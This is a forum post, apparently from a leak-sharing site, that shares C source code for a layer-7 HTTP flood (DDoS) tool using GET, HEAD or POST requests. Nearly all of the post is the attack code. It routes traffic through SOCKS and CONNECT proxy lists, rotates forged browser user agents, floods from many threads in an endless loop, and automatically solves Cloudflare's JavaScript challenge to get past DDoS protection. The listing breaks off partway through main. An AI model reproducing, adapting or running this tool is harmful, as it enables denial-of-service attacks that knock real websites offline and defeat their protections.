Layer 7 GHP (Get / Head / Post )

MWHAX7

VeryLeak's Unique Member 👑
Level 5
VeryFriend's

Torrents Stats

Messages
830
J'aime
1 013
Trophées
1 404
Inscrit
22 Décembre 2015
7434552f3cc0f4ef8ed347d56d5f0a10.png

Code:
/*
 * This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
 */
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/resource.h>
#include <sys/ioctl.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <signal.h>
#include <pthread.h>
#include <netinet/udp.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netdb.h>
#include <net/if.h>
#include <ctype.h>
#include <arpa/inet.h>
 
#define RND_CHAR (char)((rand() % 26)+97)
 
char *useragents[] = {
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
        "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
        "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
        "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
        "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
        "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
        "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
        "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
        "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
        "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
        "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
        "Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
        "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
        "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
        "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
        "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
        "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
        "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
        "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
        "Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
        "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
        "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
        "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
        "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
        "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
};
#define ATTACKPORT 80
char *postformat = "%s /%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: #useragent#\r\nConnection: close\r\n#cookies#%s\r\n%s";
char *postpayload;
struct urlparts {
        char * name;
        char separator[4];
        char value[128];
} parts[] = {
        { "scheme", ":" },
        { "userid", "@" },
        { "password", ":" },
        { "host", "//" },
        { "port", ":" },
        { "path", "/" },
        { "param", ";" },
        { "fragment", "#" }
};
enum partnames { scheme = 0, userid, password, host, port, path, param, query, fragment } ;
#define NUMPARTS (sizeof parts / sizeof (struct urlparts))
struct urlparts *returnparts[8];
struct urllist { char *url; int done; struct urllist *next; struct urllist *prev; };
struct proxy { char *type; char *ip; int port; int working; };
struct list { struct proxy *data; char *useragent; struct list *next; struct list *prev; };
struct list *head = NULL;
char parseError[128];
int parseURL(char *url, struct urlparts **returnpart);
char * strsplit(char * s, char * tok);
char firstpunc(char *s);
int strleft(char * s, int n);
void setupparts();
void freeparts();
char *stristr(const char *String, const char *Pattern);
char *str_replace(char *orig, char *rep, char *with);
char *geturl(char *url, char *useragent, char *ip);
int evalmath(char *input);
char *ipstr;
char *urll;
static int rps = 0;
pthread_mutex_t parts_mutex = PTHREAD_MUTEX_INITIALIZER;
 
void removeSubstring(char *s,const char *toremove)
{
        while( s=strstr(s,toremove) )
        {
                memmove(s,s+strlen(toremove),1+strlen(s+strlen(toremove)));
        }
}
 
 
void *flood(void *par) {
        struct list *startpoint = (struct list *)par;
        int i;
        struct sockaddr_in serverAddr;
        signal(SIGPIPE, SIG_IGN);
        char *cookies = malloc(10240);
        memset(cookies, 0, 10240);
      
        while(1)
        {
                int sent = 0;
                if(startpoint->data->working == 0)
                {
                        startpoint = startpoint->next;
                        continue;
                }
              
                memset(&serverAddr, 0, sizeof(serverAddr));
                serverAddr.sin_family = AF_INET;
                serverAddr.sin_port = htons(startpoint->data->port);
                serverAddr.sin_addr.s_addr = inet_addr(startpoint->data->ip);
                int serverSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
                u_int yes=1;
                if (setsockopt(serverSocket,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(yes)) < 0) {}
                if(connect(serverSocket, (struct sockaddr *)&serverAddr, sizeof(serverAddr)) > 0)
                {
                        startpoint->data->working = 0;
                        startpoint = startpoint->next;
                        continue;
                }
                if(strcmp(startpoint->data->type, "Socks4")==0)
                {
                        unsigned char buf[10];
                        buf[0] = 0x04;
                        buf[1] = 0x01;
                        *(unsigned short*)&buf[2] = htons(ATTACKPORT);
                        *(unsigned long*)&buf[4] = inet_addr(ipstr);
                        buf[8] = 0x00;
                        if(send(serverSocket, buf, 9, MSG_NOSIGNAL) != 9)
                        {
                                startpoint->data->working = 0;
                                startpoint = startpoint->next;
                                close(serverSocket);
                                continue;
                        }
                }
                if(strcmp(startpoint->data->type, "Socks5")==0)
                {
                        unsigned char buf[20];
                        buf[0] = 0x05;
                        buf[1] = 0x01;
                        buf[2] = 0x00;
                        if((sent = send(serverSocket, buf, 3, MSG_NOSIGNAL)) < 0)
                        {
                                startpoint->data->working = 0;
                                startpoint = startpoint->next;
                                close(serverSocket);
                                continue;
                        }
                        buf[0] = 0x05;
                        buf[1] = 0x01;
                        buf[2] = 0x00;
                        buf[3] = 0x01;
                        *(unsigned long*)&buf[4] = inet_addr(ipstr);
                        *(unsigned short*)&buf[8] = htons(ATTACKPORT);
                        if((sent = send(serverSocket, buf, 10, MSG_NOSIGNAL)) < 0)
                        {
                                startpoint->data->working = 0;
                                startpoint = startpoint->next;
                                close(serverSocket);
                                continue;
                        }
                }
                if(strcmp(startpoint->data->type, "CONNECT") == 0 || strcmp(startpoint->data->type, "TUNNEL") == 0)
                {
                        char *connectrequest = malloc(1024);
                        bzero(connectrequest, 1024);
                        sprintf(connectrequest, "CONNECT %s:80 HTTP/1.0\r\n\r\n", ipstr);
                        if((sent = send(serverSocket, connectrequest, strlen(connectrequest), MSG_NOSIGNAL)) < 0)
                        {
                                startpoint->data->working = 0;
                                startpoint = startpoint->next;
                                close(serverSocket);
                                continue;
                        }
                        char *recvbuf = malloc(1024);
                        bzero(recvbuf, 1024);
                        int gotbytes = recv(serverSocket, recvbuf, 1024, 0);
                        if(gotbytes < 1)
                        {
                                startpoint->data->working = 0;
                                startpoint = startpoint->next;
                                close(serverSocket);
                                continue;
                        }
                        free(recvbuf);
                }
                char *httpprepayload = str_replace(postpayload, "#useragent#", startpoint->useragent);
                if(httpprepayload == NULL)
                {
                        startpoint = startpoint->next;
                        close(serverSocket);
                        continue;
                }
                char *httppayload = NULL;
                if(strlen(cookies)>0)
                {
                        httppayload = str_replace(httpprepayload, "#cookies#", cookies);
                        if(httppayload == NULL)
                        {
                                startpoint = startpoint->next;
                                close(serverSocket);
                                continue;
                        }
                        free(httpprepayload);
                } else {
                        removeSubstring(httpprepayload, "#cookies#");
                        httppayload = httpprepayload;
                }
                char *tmp = NULL;
                char *lastrandom = malloc(16);
                bzero(lastrandom, 16);
                while((tmp = strstr(httppayload, "ANDOM%"))!=NULL)
                {
                        if(*(tmp-1) == 0x4C)
                        {
                                strncpy(tmp-2, lastrandom, 8);
                        } else
                        {
                                *(tmp-2) = RND_CHAR;
                                *(tmp-1) = RND_CHAR;
                                *(tmp) = RND_CHAR;
                                *(tmp+1) = RND_CHAR;
                                *(tmp+2) = RND_CHAR;
                                *(tmp+3) = RND_CHAR;
                                *(tmp+4) = RND_CHAR;
                                *(tmp+5) = RND_CHAR;
                                strncpy(lastrandom, tmp-2, 8);
                        }
                      
                }
                send(serverSocket, httppayload, strlen(httppayload), MSG_NOSIGNAL);
                free(httppayload);
                int bytes = 0;
                int total = 0;
                int currentsize = 4096;
                char *buffer = malloc(4096);
                bzero(buffer, 4096);
                bytes = recv(serverSocket, buffer, 4096, 0);
                while(bytes > 0)
                {
                        total += bytes;
                        if(total+4096 > currentsize)
                        {
                                char *new_buffer = malloc(total+4097);
                                bzero(new_buffer, total+4097);
                                memcpy(new_buffer, buffer, total);
                                free(buffer);
                                buffer = new_buffer;
                                currentsize = total+4096;
                        }
                        bytes = recv(serverSocket, buffer+total, 4096, 0);
                }
                if(strstr(buffer, "\r\n\r\n")==NULL)
                {
                        free(buffer);
                        startpoint = startpoint->next;
                        close(serverSocket);
                        continue;
                }
                char *headerstatus = malloc(strstr(buffer, "\r\n\r\n") - buffer + 3);
                memcpy(headerstatus, buffer, strstr(buffer, "\r\n\r\n") - buffer + 2);
                char *body = buffer + (strstr(buffer, "\r\n\r\n") - buffer + 2) + 2;
                char *headers = strstr(headerstatus, "\r\n")+2;
                if(stristr(body, "DDoS protection by CloudFlare") != NULL && stristr(body, "ChallengeForm") != NULL && stristr(body, "('#jschl_answer').val") != NULL && stristr(body, "jschl_vc") != NULL)
                {
                        close(serverSocket);
                        //we are pretty sure its a CF block page at this point
                        char *formstart = stristr(body, "<form")+5;
                        char *formend = stristr(formstart, "</form");
                        char *action = stristr(formstart, "action=");
                        char *actionname = NULL;
                        if(action == NULL || action > formend)
                        {
                                actionname = urll;
                        } else {
                                char *actionstart = action;
                                if(strchr(actionstart, '"') != NULL && strchr(actionstart, '>') > strchr(actionstart, '"'))
                                {
                                        actionstart = strchr(action, '"')+1;
                                        actionname = malloc(strchr(actionstart, '"') - actionstart + 1);
                                        bzero(actionname, strchr(actionstart, '"') - actionstart + 1);
                                        strncpy(actionname, actionstart, strchr(actionstart, '"') - actionstart);
                                } else if(strchr(actionstart, '\'') != NULL && strchr(actionstart, '>') > strchr(actionstart, '\''))
                                {
                                        actionstart = strchr(action, '\'')+1;
                                        actionname = malloc(strchr(actionstart, '\'') - actionstart + 1);
                                        bzero(actionname, strchr(actionstart, '\'') - actionstart + 1);
                                        strncpy(actionname, actionstart, strchr(actionstart, '\'') - actionstart);
                                } else {
                                        char *end = NULL;
                                        if(strchr(actionstart, ' ') > strchr(actionstart, '>'))
                                        {
                                                end = strchr(actionstart, '>');
                                        } else {
                                                end = strchr(actionstart, ' ');
                                        }
                                        actionname = malloc(end - action + 1);
                                        bzero(actionname, end - action + 1);
                                        strncpy(actionname, action, end - action);
                                }
                        }
                        if(strcmp(actionname, "") == 0)
                        {
                                free(actionname);
                                actionname = urll;
                        }
                        char *magiccookiestart = stristr(formstart, "name=\"jschl_vc\" value=\"");
                        if(magiccookiestart==NULL)
                        {
                                free(headerstatus);
                                free(buffer);
                                close(serverSocket);
                                startpoint = startpoint->next;
                                continue;
                        }
                        magiccookiestart = magiccookiestart+strlen("name=\"jschl_vc\" value=\"");
                        char *magiccookie = malloc((stristr(magiccookiestart, "\"")+1)-magiccookiestart+1);
                        memset(magiccookie, 0, (stristr(magiccookiestart, "\"")+1)-magiccookiestart+1);
                        strncpy(magiccookie, magiccookiestart, stristr(magiccookiestart, "\"")-magiccookiestart);
                      
                        char *magicsumstart = stristr(body, "('#jschl_answer').val(");
                        if(magicsumstart==NULL)
                        {
                                free(magiccookie);
                                free(headerstatus);
                                free(buffer);
                                close(serverSocket);
                                startpoint = startpoint->next;
                                continue;
                        }
                        magicsumstart = magicsumstart+strlen("('#jschl_answer').val(");
                        char *temp = malloc(1024);
                        memset(temp, 0, 1024);
                        strncpy(temp, magicsumstart, strstr(magicsumstart, ")")-magicsumstart);
                        magicsumstart = temp;
                      
                        int sum = 0;
                        sum = evalmath(magicsumstart);
                      
                        char *verifydata = malloc(1024);
                        memset(verifydata, 0, 1024);
                        strcat(verifydata, "act=jschl&jschl_vc=");
                        strcat(verifydata, magiccookie);
                        strcat(verifydata, "&jschl_answer=");
                        char *sumstring = malloc(100);
                        memset(sumstring, 0, 100);
                        sprintf(sumstring, "%d", sum);
                        strcat(verifydata, sumstring);
                      
                        free(sumstring);
                        char *verifypost = malloc(4096);
                        memset(verifypost, 0, 4096);
                        free(buffer);
                        free(magicsumstart);
                        free(magiccookie);
                      
                        char *cookit = NULL;
                        memset(cookies, 0, 10240);
                        strcpy(cookies, "Cookie: ");
                        int offset = 0;
                        while(stristr(headers+offset, "Set-Cookie: ") != NULL)
                        {
                                cookit = stristr(headers, "Set-Cookie: ")+strlen("Set-Cookie: ");
                                char *cookitend = stristr(cookit, "\r\n")>stristr(cookit, ";") ? stristr(cookit, ";") : stristr(cookit, "\r\n");
                                if(cookitend-cookit<1)
                                {
                                        continue;
                                }
                                char *temp = malloc((cookitend-cookit)+3);
                                bzero(temp, (cookitend-cookit)+3);
                                strncpy(temp, cookit, cookitend-cookit);
                                strcat(temp, "; ");
                                if(strstr(cookies, temp)==NULL)
                                {
                                        strncpy(cookies+strlen(cookies), temp, strlen(temp));
                                }
                                offset += strstr(cookit, "\r\n")-cookit;
                        }
                        strcat(cookies, "\r\n");
                        free(headerstatus);
                      
                        pthread_mutex_lock(&parts_mutex);
                        setupparts();
                        parseURL(actionname, returnparts);
                        char *herpderp = "POST /%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n%sContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n\r\n%s";
                        sprintf(verifypost, herpderp, returnparts[path]->value, returnparts[host]->value, startpoint->useragent, cookies, strlen(verifydata), verifydata);
                        freeparts();
                        free(verifydata);
                        pthread_mutex_unlock(&parts_mutex);
                      
                        memset(&serverAddr, 0, sizeof(serverAddr));
                        serverAddr.sin_family = AF_INET;
                        serverAddr.sin_port = htons(startpoint->data->port);
                        serverAddr.sin_addr.s_addr = inet_addr(startpoint->data->ip);
                        serverSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
                        yes=1;
                        if (setsockopt(serverSocket,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(yes)) < 0) {}
                      
                        if(connect(serverSocket, (struct sockaddr *)&serverAddr, sizeof(serverAddr)) > 0)
                        {
                                startpoint->data->working = 0;
                                startpoint = startpoint->next;
                                continue;
                        }
                        if(strcmp(startpoint->data->type, "Socks4")==0)
                        {
                                unsigned char buf[10];
                                buf[0] = 0x04;
                                buf[1] = 0x01;
                                *(unsigned short*)&buf[2] = htons(ATTACKPORT);
                                *(unsigned long*)&buf[4] = inet_addr(ipstr);
                                buf[8] = 0x00;
                                if(send(serverSocket, buf, 9, MSG_NOSIGNAL) != 9)
                                {
                                        startpoint->data->working = 0;
                                        startpoint = startpoint->next;
                                        close(serverSocket);
                                        continue;
                                }
                        }
                        if(strcmp(startpoint->data->type, "Socks5")==0)
                        {
                                unsigned char buf[20];
                                buf[0] = 0x05;
                                buf[1] = 0x01;
                                buf[2] = 0x00;
                                if((sent = send(serverSocket, buf, 3, MSG_NOSIGNAL)) < 0)
                                {
                                        startpoint->data->working = 0;
                                        startpoint = startpoint->next;
                                        close(serverSocket);
                                        continue;
                                }
                                buf[0] = 0x05;
                                buf[1] = 0x01;
                                buf[2] = 0x00;
                                buf[3] = 0x01;
                                *(unsigned long*)&buf[4] = inet_addr(ipstr);
                                *(unsigned short*)&buf[8] = htons(ATTACKPORT);
                                if((sent = send(serverSocket, buf, 10, MSG_NOSIGNAL)) < 0)
                                {
                                        startpoint->data->working = 0;
                                        startpoint = startpoint->next;
                                        close(serverSocket);
                                        continue;
                                }
                        }
                        if(strcmp(startpoint->data->type, "CONNECT") == 0 || strcmp(startpoint->data->type, "TUNNEL") == 0)
                        {
                                char *connectrequest = malloc(1024);
                                bzero(connectrequest, 1024);
                                sprintf(connectrequest, "CONNECT %s:80 HTTP/1.0\r\n\r\n", ipstr);
                                if((sent = send(serverSocket, connectrequest, strlen(connectrequest), MSG_NOSIGNAL)) < 0)
                                {
                                        startpoint->data->working = 0;
                                        startpoint = startpoint->next;
                                        close(serverSocket);
                                        continue;
                                }
                                char *recvbuf = malloc(1024);
                                bzero(recvbuf, 1024);
                                int gotbytes = recv(serverSocket, recvbuf, 1024, 0);
                                if(gotbytes < 1)
                                {
                                        startpoint->data->working = 0;
                                        startpoint = startpoint->next;
                                        close(serverSocket);
                                        continue;
                                }
                                free(recvbuf);
                        }
                        send(serverSocket, verifypost, strlen(verifypost), MSG_NOSIGNAL);
                        free(verifypost);
                        bytes = 0;
                        buffer = malloc(4097);
                        bzero(buffer, 4097);
                        bytes = recv(serverSocket, buffer, 4096, 0);
                        while(bytes > 0)
                        {
                                total += bytes;
                                if(total+4096 > currentsize)
                                {
                                        char *new_buffer = malloc(total+4097);
                                        bzero(new_buffer, total+4097);
                                        memcpy(new_buffer, buffer, total);
                                        free(buffer);
                                        buffer = new_buffer;
                                        currentsize = total+4096;
                                }
                                bytes = recv(serverSocket, buffer+total, 4096, 0);
                        }
                        if(strstr(buffer, "\r\n\r\n")==NULL)
                        {
                                free(buffer);
                                startpoint = startpoint->next;
                                close(serverSocket);
                                continue;
                        }
                      
                        headerstatus = malloc(strstr(buffer, "\r\n\r\n") - buffer + 3);
                        memcpy(headerstatus, buffer, strstr(buffer, "\r\n\r\n") - buffer + 2);
                        body = buffer + (strstr(buffer, "\r\n\r\n") - buffer + 2) + 2;
                        headers = stristr(headerstatus, "\r\n")+2;
                        char *cookoff = strstr(cookies, "\r\n");
                        if(cookoff == NULL)
                        {
                                free(headerstatus);
                                free(buffer);
                                startpoint = startpoint->next;
                                close(serverSocket);
                                continue;
                        }
                        offset = 0;
                        while(stristr(headers+offset, "Set-Cookie: ") != NULL)
                        {
                                cookit = stristr(headers, "Set-Cookie: ")+strlen("Set-Cookie: ");
                                char *cookitend = stristr(cookit, "\r\n")>stristr(cookit, ";") ? stristr(cookit, ";") : stristr(cookit, "\r\n");
                                char *cookiesend = strstr(cookies, "\r\n");
                                if(cookitend-cookit<1)
                                {
                                        continue;
                                }
                                char *temp = malloc((cookitend-cookit)+3);
                                bzero(temp, (cookitend-cookit)+1);
                                strncpy(temp, cookit, cookitend-cookit);
                                strcat(temp, "; ");
                                if(strstr(cookies, temp)==NULL)
                                {
                                        strncpy(cookies+(cookiesend-cookies), temp, strlen(temp));
                                        strcat(cookies, "\r\n");
                                }
                                offset += strstr(cookit, "\r\n")-cookit;
                        }
                        close(serverSocket);
                      
                        memset(&serverAddr, 0, sizeof(serverAddr));
                        serverAddr.sin_family = AF_INET;
                        serverAddr.sin_port = htons(startpoint->data->port);
                        serverAddr.sin_addr.s_addr = inet_addr(startpoint->data->ip);
                        serverSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
                        yes=1;
                        if (setsockopt(serverSocket,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(yes)) < 0) {}
                        if(connect(serverSocket, (struct sockaddr *)&serverAddr, sizeof(serverAddr)) > 0)
                        {
                                startpoint->data->working = 0;
                                startpoint = startpoint->next;
                                continue;
                        }
                        if(strcmp(startpoint->data->type, "Socks4")==0)
                        {
                                unsigned char buf[10];
                                buf[0] = 0x04;
                                buf[1] = 0x01;
                                *(unsigned short*)&buf[2] = htons(ATTACKPORT);
                                *(unsigned long*)&buf[4] = inet_addr(ipstr);
                                buf[8] = 0x00;
                                if(send(serverSocket, buf, 9, MSG_NOSIGNAL) != 9)
                                {
                                        startpoint->data->working = 0;
                                        startpoint = startpoint->next;
                                        close(serverSocket);
                                        continue;
                                }
                        }
                        if(strcmp(startpoint->data->type, "Socks5")==0)
                        {
                                unsigned char buf[20];
                                buf[0] = 0x05;
                                buf[1] = 0x01;
                                buf[2] = 0x00;
                                if((sent = send(serverSocket, buf, 3, MSG_NOSIGNAL)) < 0)
                                {
                                        startpoint->data->working = 0;
                                        startpoint = startpoint->next;
                                        close(serverSocket);
                                        continue;
                                }
                                buf[0] = 0x05;
                                buf[1] = 0x01;
                                buf[2] = 0x00;
                                buf[3] = 0x01;
                                *(unsigned long*)&buf[4] = inet_addr(ipstr);
                                *(unsigned short*)&buf[8] = htons(ATTACKPORT);
                                if((sent = send(serverSocket, buf, 10, MSG_NOSIGNAL)) < 0)
                                {
                                        startpoint->data->working = 0;
                                        startpoint = startpoint->next;
                                        close(serverSocket);
                                        continue;
                                }
                        }
                        if(strcmp(startpoint->data->type, "CONNECT") == 0 || strcmp(startpoint->data->type, "TUNNEL") == 0)
                        {
                                char *connectrequest = malloc(1024);
                                bzero(connectrequest, 1024);
                                sprintf(connectrequest, "CONNECT %s:80 HTTP/1.0\r\n\r\n", ipstr);
                                if((sent = send(serverSocket, connectrequest, strlen(connectrequest), MSG_NOSIGNAL)) < 0)
                                {
                                        startpoint->data->working = 0;
                                        startpoint = startpoint->next;
                                        close(serverSocket);
                                        continue;
                                }
                                char *recvbuf = malloc(1024);
                                bzero(recvbuf, 1024);
                                int gotbytes = recv(serverSocket, recvbuf, 1024, 0);
                                if(gotbytes < 1)
                                {
                                        startpoint->data->working = 0;
                                        startpoint = startpoint->next;
                                        close(serverSocket);
                                        continue;
                                }
                                free(recvbuf);
                        }
                        httpprepayload = str_replace(postpayload, "#useragent#", startpoint->useragent);
                        if(httpprepayload == NULL)
                        {
                                startpoint = startpoint->next;
                                close(serverSocket);
                                continue;
                        }
                        httppayload = NULL;
                        if(strlen(cookies)>0)
                        {
                                httppayload = str_replace(httpprepayload, "#cookies#", cookies);
                                if(httppayload == NULL)
                                {
                                        startpoint = startpoint->next;
                                        close(serverSocket);
                                        continue;
                                }
                                free(httpprepayload);
                        } else {
                                removeSubstring(httpprepayload, "#cookies#");
                                httppayload = httpprepayload;
                        }
                        tmp = NULL;
                        lastrandom = malloc(16);
                        bzero(lastrandom, 16);
                        while((tmp = strstr(httppayload, "ANDOM%"))!=NULL)
                        {
                                if(*(tmp-1) == 0x4C)
                                {
                                        strncpy(tmp-2, lastrandom, 8);
                                } else
                                {
                                        *(tmp-2) = RND_CHAR;
                                        *(tmp-1) = RND_CHAR;
                                        *(tmp) = RND_CHAR;
                                        *(tmp+1) = RND_CHAR;
                                        *(tmp+2) = RND_CHAR;
                                        *(tmp+3) = RND_CHAR;
                                        *(tmp+4) = RND_CHAR;
                                        *(tmp+5) = RND_CHAR;
                                        strncpy(lastrandom, tmp-2, 8);
                                }
                              
                        }
                        send(serverSocket, httppayload, strlen(httppayload), MSG_NOSIGNAL);
                        free(httppayload);
                        bytes = 0;
                        buffer = malloc(4096);
                        bytes = recv(serverSocket, buffer, 4096, 0);
                        while(bytes > 0)
                        {
                                bzero(buffer, 4096);
                                bytes = recv(serverSocket, buffer, 4096, 0);
                        }
                }
                free(headerstatus);
                free(buffer);
                close(serverSocket);
                rps++;
                usleep(30000);
                startpoint = startpoint->next;
        }
}
pthread_t **threads = NULL;
int main(int argc, char *argv[ ]) {
        if(argc < 6 || !canRun()){
                fprintf(stderr, "Invalid parameters!\n");
                fprintf(stdout, "Usage: %s <target url> <method (GET or HEAD or POST)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [post parameters (%RANDOM% will be replaced with random shit)]\n", argv[0]);
                exit(-1);
        }
        fprintf(stdout, "Setting up Sockets...\n");
        int num_threads = atoi(argv[3]);
        char *method = argv[2];
        if(!(strcmp(method, "GET")==0 || strcmp(method, "HEAD")==0|| strcmp(method, "POST")==0))
        {
                fprintf(stderr, "Invalid parameters!\n");
                fprintf(stdout, "Usage: %s <target url> <method (GET or HEAD or POST)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [post parameters (%RANDOM% will be replaced with random shit)]\n", argv[0]);
                exit(-1);
        }
        FILE *pFile = fopen(argv[4], "rb");
        if(pFile==NULL)
        {
                perror("fopen"); exit(1);
        }
        fseek(pFile, 0, SEEK_END);
        long lSize = ftell(pFile);
        rewind(pFile);
        char *buffer = (char *)malloc(lSize*sizeof(char));
        fread(buffer, 1, lSize, pFile);
        fclose (pFile);
        int i=0;
        char *pch = (char *)strtok(buffer, ":");
        while(pch != NULL)
        {
                if(head == NULL)
                {
                        head = (struct list *)malloc(sizeof(struct list));
                        bzero(head, sizeof(struct list));
                        head->data = (struct proxy *)malloc(sizeof(struct proxy));
                        bzero(head->data, sizeof(struct proxy));
                        head->data->working = 1;
                        head->data->ip = malloc(strlen(pch)+1); strcpy(head->data->ip, pch);
                        pch = (char *)strtok(NULL, ":");
                        if(pch == NULL) exit(-1);
                        head->data->port = atoi(pch);
                        pch = (char *)strtok(NULL, ":");
                        head->data->type = malloc(strlen(pch)+1); strcpy(head->data->type, pch);
                        pch = (char *)strtok(NULL, ":");
                        head->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
                        head->next = head;
                        head->prev = head;
                } else {
                        struct list *new_node = (struct list *)malloc(sizeof(struct list));
                        bzero(new_node, sizeof(struct list));
                        new_node->data = (struct proxy *)malloc(sizeof(struct proxy));
                        bzero(new_node->data, sizeof(struct proxy));
                        new_node->data->working = 1;
